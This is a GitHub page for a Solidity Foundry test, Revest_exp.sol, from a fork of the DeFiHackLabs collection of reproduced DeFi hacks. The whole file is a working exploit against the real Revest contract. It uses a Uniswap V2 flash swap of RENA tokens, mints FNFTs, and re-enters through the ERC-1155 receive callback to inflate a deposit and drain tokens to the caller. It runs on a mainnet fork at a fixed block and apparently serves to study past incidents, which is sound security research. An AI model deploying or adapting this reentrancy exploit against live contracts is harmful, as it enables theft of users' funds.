forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Revest_exp.sol
90 lines (81 loc) · 2.64 KB
/
Revest_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./interface.sol";
contract ContractTest is DSTest {
IUniswapV2Pair pair =
IUniswapV2Pair(0xbC2C5392b0B841832bEC8b9C30747BADdA7b70ca);
IERC20 rena = IERC20(0x56de8BC61346321D4F2211e3aC3c0A7F00dB9b76);
IRevest revest = IRevest(0x2320A28f52334d62622cc2EaFa15DE55F9987eD9);
uint256 fnftId;
bool reentered = false;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("mainnet", 14465356); //fork mainnet at 14465356
}
function testExploit() public {
emit log_named_uint(
"Before exploit, Rena balance of attacker:",
rena.balanceOf(msg.sender)
);
pair.swap(5 * 1e18, 0, address(this), new bytes(1));
emit log_named_uint(
"After exploit, Rena balance of attacker:",
rena.balanceOf(msg.sender)
);
}
function uniswapV2Call(
address sender,
uint256 amount0,
uint256 amount1,
bytes calldata data
) public {
rena.approve(address(revest), type(uint256).max);
IRevest.FNFTConfig memory fnftConfig;
fnftConfig.asset = address(rena);
fnftConfig.pipeToContract = 0x0000000000000000000000000000000000000000;
fnftConfig.depositAmount = 0;
fnftConfig.depositMul = 0;
fnftConfig.split = 0;
fnftConfig.depositStopTime = 0;
fnftConfig.maturityExtension = false;
fnftConfig.isMulti = true;
fnftConfig.nontransferrable = false;
address[] memory recipients = new address[](1);
uint256[] memory quantities = new uint256[](1);
recipients[0] = address(this);
quantities[0] = uint256(2);
fnftId = revest.mintAddressLock(
address(this),
new bytes(0),
recipients,
quantities,
fnftConfig
);
quantities[0] = uint256(360000);
revest.mintAddressLock(
address(this),
new bytes(0),
recipients,
quantities,
fnftConfig
);
revest.withdrawFNFT(fnftId + 1, 360000 + 1);
rena.transfer(msg.sender, ((((amount0 / 997) * 1000) / 99) * 100) + 1000);
rena.transfer(tx.origin, rena.balanceOf(address(this)));
}
function onERC1155Received(
address operator,
address from,
uint256 id,
uint256 value,
bytes calldata data
) public returns (bytes4) {
if (id == fnftId + 1 && !reentered) {
reentered = true;
revest.depositAdditionalToFNFT(fnftId, 1e18, 1);
}
return this.onERC1155Received.selector;
}
}